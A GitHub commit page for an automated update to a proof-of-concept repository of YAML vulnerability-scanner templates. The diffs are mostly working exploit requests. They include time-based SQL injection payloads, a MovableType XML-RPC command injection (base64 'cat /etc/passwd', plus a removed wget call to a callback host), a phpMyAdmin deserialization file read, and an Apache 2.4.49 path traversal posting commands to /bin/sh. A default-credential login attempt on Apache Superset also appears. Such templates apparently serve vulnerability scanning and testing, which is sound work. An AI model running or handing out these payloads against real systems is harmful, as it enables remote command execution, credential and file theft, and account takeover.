Skip to content

Commit

Permalink
20240819
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Aug 19, 2024
1 parent ce4c720 commit 8b2291e
Show file tree
Hide file tree
Showing 28 changed files with 657 additions and 426 deletions.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20240818
20240819
6 changes: 5 additions & 1 deletion poc/auth/BlindSQLAuth.yaml
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
id: time-based-sqli
info:
name: Time-Based Blind SQL Injection
author: 3rag
author: Coffinxp/lostsec
severity: Critical
description: Detects time-based blind SQL injection vulnerability
http:
Expand All @@ -11,8 +11,12 @@ http:
payloads:
injection:
- "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
- "'%2b(select*from(select(sleep(7)))a)%2b'"
- "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
- "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z"
- "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X"
- "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
- "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X"
- "if(now()=sysdate(),SLEEP(7),0)"
- "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
- "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
Expand Down
61 changes: 14 additions & 47 deletions poc/cve/CVE-2021–20837.yaml
Original file line number Diff line number Diff line change
@@ -1,56 +1,23 @@
id: CVE-2021-20837

info:
name: MovableType - Remote Command Injection
author: dhiyaneshDK,hackergautam
name: RCE in MovableType
author: zin_min_phyo
severity: critical
description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
reference:
- https://nemesis.sh/posts/movable-type-0day/
- https://github.com/ghost-nemesis/cve-2021-20837-poc
- https://twitter.com/cyber_advising/status/1454051725904580608
- https://nvd.nist.gov/vuln/detail/CVE-2021-20837
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-20837
cwe-id: CWE-78
tags: cve,cve2021,rce,movable
reference: https://nemesis.sh/posts/movable-type-0day/
tags: MovableType,RCE

requests:
- raw:
- |
POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
- method: POST
path:
- "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi"

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
{{base64("`wget http://{{interactsh-url}}`")}}
</base64>
</value>
</param>
</params>
</methodCall>
body: '<?xml version="1.0"?><methodCall><methodName>mt.handler_to_coderef</methodName><params><param><value><base64>YGNhdCAvZXRjL3Bhc3N3ZGA=</base64></value></param></params></methodCall>'

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"

- type: word
words:
- "failed loading package"

- type: status
status:
- 200

# Enhanced by mp on 2022/05/05

matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
22 changes: 14 additions & 8 deletions poc/cve/cve-2009-1151.yaml
Original file line number Diff line number Diff line change
@@ -1,15 +1,21 @@
id: CVE-2009-1151

info:
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: high
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
severity: critical
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433


- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2009-1151
cwe-id: CWE-77
tags: cve,cve2009,phpmyadmin,rce,deserialization,kev
requests:
- raw:
- |
Expand All @@ -20,13 +26,13 @@ requests:
Content-Type: application/x-www-form-urlencoded
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
matchers-condition: and
matchers:
- type: status
status:
- 200

- type: regex
regex:
- "root:.*:0:0:"

# Enhanced by mp on 2022/07/06
8 changes: 6 additions & 2 deletions poc/cve/cve-2016-6210.yaml
Original file line number Diff line number Diff line change
@@ -1,9 +1,10 @@
id: CVE-2016-6210

info:
name: OpenSSH username enumeration < v7.3
author: iamthefrogy,forgedhallpass
severity: medium
tags: cve,cve2016,network,openssh

description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities.
reference:
- http://seclists.org/fulldisclosure/2016/Jul/51
Expand All @@ -15,15 +16,18 @@ info:
cvss-score: 5.9
cve-id: CVE-2016-6210
cwe-id: CWE-200

network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"

matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)'

extractors:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
- '(?i)SSH-2.0-OpenSSH_[^\r\n]+'
14 changes: 7 additions & 7 deletions poc/cve/cve-2018-15473.yaml
Original file line number Diff line number Diff line change
@@ -1,28 +1,28 @@
id: CVE-2018-15473

info:
name: OpenSSH Username Enumeration <= v7.7
author: r3dg33k,daffainfo,forgedhallpass
severity: medium
description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-15473
- https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0
- https://bugs.debian.org/906236
- http://www.openwall.com/lists/oss-security/2018/08/15/5
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cvss-score: 5.3
cve-id: CVE-2018-15473
cwe-id: CWE-362


tags: network,openssh,cve,cve2018
network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"

matchers:
- type: regex
regex:
- '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)'

extractors:
- type: regex
regex:
Expand Down
11 changes: 5 additions & 6 deletions poc/cve/cve-2018-18778.yaml
Original file line number Diff line number Diff line change
@@ -1,18 +1,18 @@
id: CVE-2018-18778

info:
name: mini_httpd Path Traversal
author: dhiyaneshDK
severity: medium
description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/

reference:
- https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
- http://www.acme.com/software/mini_httpd/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.50
cvss-score: 6.5
cve-id: CVE-2018-18778
cwe-id: CWE-200

tags: cve,cve2018,lfi,mini_httpd
requests:
- raw:
- |+
Expand All @@ -25,7 +25,6 @@ requests:
- type: status
status:
- 200

- type: regex
regex:
- "root:.*:0:0:"
8 changes: 8 additions & 0 deletions poc/cve/cve-2021-44451.yaml
Original file line number Diff line number Diff line change
@@ -1,4 +1,5 @@
id: CVE-2021-44451

info:
name: Apache Superset Default Login
author: dhiyaneshDK
Expand All @@ -11,12 +12,14 @@ info:
tags: apache, default-login
classification:
cve-id: CVE-2021-44451

requests:
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Expand All @@ -25,12 +28,14 @@ requests:
Referer: {{BaseURL}}/admin/airflow/login
csrf_token={{csrf_token}}&username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin

extractors:
- type: regex
name: csrf_token
Expand All @@ -39,6 +44,7 @@ requests:
internal: true
regex:
- 'value="(.*?)">'

matchers-condition: and
matchers:
- type: word
Expand All @@ -48,10 +54,12 @@ requests:
- '<title>Redirecting...</title>'
- '<h1>Redirecting...</h1'
- '<a href="/">'

- type: word
part: header
words:
- 'session'

- type: status
status:
- 302
Expand Down
51 changes: 41 additions & 10 deletions poc/cve/rce-cve-2021-41773.yaml
Original file line number Diff line number Diff line change
@@ -1,16 +1,47 @@
id: CVE-2021-41773

info:
name: RCE in Apache HTTP Server 2.4.49
author: RafaelCaria
severity: critical
tags: cve,cve2021,rce
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-41773
cwe-id: CWE-22
metadata:
shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49

requests:
- method: POST
path:
- '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
body: 'echo;id'
- raw:
- |
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
matchers-condition: or
matchers:

- type: regex
part: body
name: LFI
regex:
- "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b"
- "root:.*:0:0"

- type: word
name: RCE
words:
- "CVE-2021-41773-POC"
Loading

0 comments on commit 8b2291e

Please sign in to comment.